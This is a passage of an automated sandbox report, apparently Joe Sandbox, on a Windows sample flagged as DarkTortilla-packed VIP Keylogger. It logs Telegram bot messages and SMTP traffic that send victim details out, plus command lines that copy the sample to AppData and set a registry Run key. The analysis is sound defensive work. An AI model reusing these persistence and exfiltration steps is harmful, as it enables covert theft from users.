2024-08-18 19:25:47 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/08/2024%20/%2008:15:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-08-18 19:25:47 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 18 Aug 2024 19:25:47 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-08-18 19:25:47 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49766	188.114.97.3	443	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:49 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-18 19:25:49 UTC	708	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:49 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12408 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KD77ULtbyiQHqacnJHz%2FrTIZfAC2E4V9QAnSE1Tibn4MyfzOiDxC%2FAXmMCxHdvVCR0kPZpagpsXg%2FIlnOHLxNuNCyI7vSAh4K0DHpwaUbWK%2F5N0BahbfS2G8ARH1iNpgd7oWo1xt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544ac0a8604246-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:49 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49768	188.114.97.3	443	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:50 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-18 19:25:51 UTC	714	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:50 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12409 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tk1JYCrc%2FMuGFZRHbNmNuyxYfeVmBtw%2B2CtWbz%2BNMWLmRT8XflQnvbAtpCI1CUy7ABknJr58cf5jz%2FvaCB4zQP%2Fykin4R%2FsN9SdkrMmfw2DLRm%2BQW8OpmYcoXpAbzQ0puaGEc7JI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544ac96b281a44-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:51 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49770	188.114.97.3	443	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:52 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-18 19:25:52 UTC	706	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:52 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12411 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VRECd5mTrW%2FGQKcomA6KlMwC%2BlQdolO32REgEZY6L9fchOct3wIW9xguhIoVip9LIgXMVEcZLPL5E2f9PgNZ3wOm9V%2B0KXLXFa5vRZrjKSVvYOs02SM30dKtBi4pi8bxSJwYCr62"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544ad28bb48c54-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:52 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49773	188.114.97.3	443	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:53 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-18 19:25:53 UTC	710	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:53 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12412 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ea%2FqHpNcxVa0%2FRVm1jX%2B%2FHRFmw7t4DYlIDG1RLIX6%2B8vckygoxp8Y0GPFEuizVCu5pFKj68Zk6FXb63Kdm09V453LxBFbT6uVrwLKeROb2HsqMtCJ4AJ4OYogsLui2TLLw8Kz5Ds"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544adb688e0f6b-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:53 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49775	188.114.97.3	443	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:55 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-18 19:25:55 UTC	716	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:55 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12414 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VUr6C%2FIaQ9%2BmVRPd%2FKT660T2wTmFkAC%2Fkh1HAnDatb9KYXziYfdqYlePs5SMKzBY8WJFGi%2BxaDZVkoHD4S%2F2oxgvmmyxT5pwA5s%2Ba1oAMDYKA%2FSybEejlbaN4hHCKLXLbvpcxTFm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544ae45c7dc481-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:55 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49777	188.114.97.3	443	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:56 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-18 19:25:56 UTC	716	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:56 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12415 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bzye4gEEpK%2FCNqhqipOsrDjC2eboOtefuoTsrxRp9xZy%2FT1YxJE6VB6le4t4fwc%2F5Lo%2FtEfjxF6%2F%2BD9FhIWD22v3aFbgde%2BFdk1hRaLnH9TPvMiqL0JAFVwbNIiyBMDyjvkKRi2A"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544aed6dfc0c9e-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:56 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49778	149.154.167.220	443	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:57 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/08/2024%20/%2007:07:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-08-18 19:25:58 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 18 Aug 2024 19:25:58 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-08-18 19:25:58 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Aug 18, 2024 21:25:53.825695038 CEST	587	49772	185.230.212.164	192.168.2.4	220 mx.zoho.eu SMTP Server ready August 18, 2024 9:25:53 PM CEST
Aug 18, 2024 21:25:53.828296900 CEST	49772	587	192.168.2.4	185.230.212.164	EHLO 675052
Aug 18, 2024 21:25:54.133965969 CEST	587	49772	185.230.212.164	192.168.2.4	250-mx.zoho.eu Hello 675052 (8.46.123.33 (8.46.123.33)) 250-STARTTLS 250 SIZE 53477376
Aug 18, 2024 21:25:54.136277914 CEST	49772	587	192.168.2.4	185.230.212.164	STARTTLS
Aug 18, 2024 21:25:54.314455986 CEST	587	49772	185.230.212.164	192.168.2.4	220 Ready to start TLS.
Aug 18, 2024 21:26:04.115439892 CEST	587	49779	185.230.212.164	192.168.2.4	220 mx.zoho.eu SMTP Server ready August 18, 2024 9:26:03 PM CEST
Aug 18, 2024 21:26:07.037107944 CEST	49779	587	192.168.2.4	185.230.212.164	EHLO 675052
Aug 18, 2024 21:26:07.220210075 CEST	587	49779	185.230.212.164	192.168.2.4	250-mx.zoho.eu Hello 675052 (8.46.123.33 (8.46.123.33)) 250-STARTTLS 250 SIZE 53477376
Aug 18, 2024 21:26:07.220357895 CEST	49779	587	192.168.2.4	185.230.212.164	STARTTLS
Aug 18, 2024 21:26:07.401110888 CEST	587	49779	185.230.212.164	192.168.2.4	220 Ready to start TLS.

Target ID:	0
Start time:	15:23:56
Start date:	18/08/2024
Path:	C:\Users\user\Desktop\File.com.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\File.com.exe"
Imagebase:	0x530000
File size:	2'387'968 bytes
MD5 hash:	8B4E3A62D01F4D0CF638607B5E7FB2A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1839360978.0000000003BC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1837377657.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1847264743.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1839360978.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:24:01
Start date:	18/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd" /c ping 127.0.0.1 -n 17 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:24:01
Start date:	18/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:24:01
Start date:	18/08/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 17
Imagebase:	0x6c0000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:24:11
Start date:	18/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd" /c ping 127.0.0.1 -n 21 > nul && copy "C:\Users\user\Desktop\File.com.exe" "C:\Users\user\AppData\Roaming\xxlooa.exe" && ping 127.0.0.1 -n 21 > nul && "C:\Users\user\AppData\Roaming\xxlooa.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:24:11
Start date:	18/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:24:11
Start date:	18/08/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 21
Imagebase:	0x6c0000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:24:18
Start date:	18/08/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe"
Imagebase:	0xfa0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:24:32
Start date:	18/08/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 21
Imagebase:	0x6c0000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:24:37
Start date:	18/08/2024
Path:	C:\Users\user\AppData\Roaming\xxlooa.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\xxlooa.exe"
Imagebase:	0x250000
File size:	2'387'968 bytes
MD5 hash:	8B4E3A62D01F4D0CF638607B5E7FB2A1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs Detection: 49%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:24:38
Start date:	18/08/2024
Path:	C:\Users\user\AppData\Roaming\xxlooa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\xxlooa.exe"
Imagebase:	0x250000
File size:	2'387'968 bytes
MD5 hash:	8B4E3A62D01F4D0CF638607B5E7FB2A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000010.00000002.2563514752.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000010.00000002.2574650182.0000000004396000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000010.00000002.2574650182.0000000004495000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:24:52
Start date:	18/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x8c0000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000011.00000002.2941974221.0000000002B97000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000011.00000002.2962556300.0000000005327000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 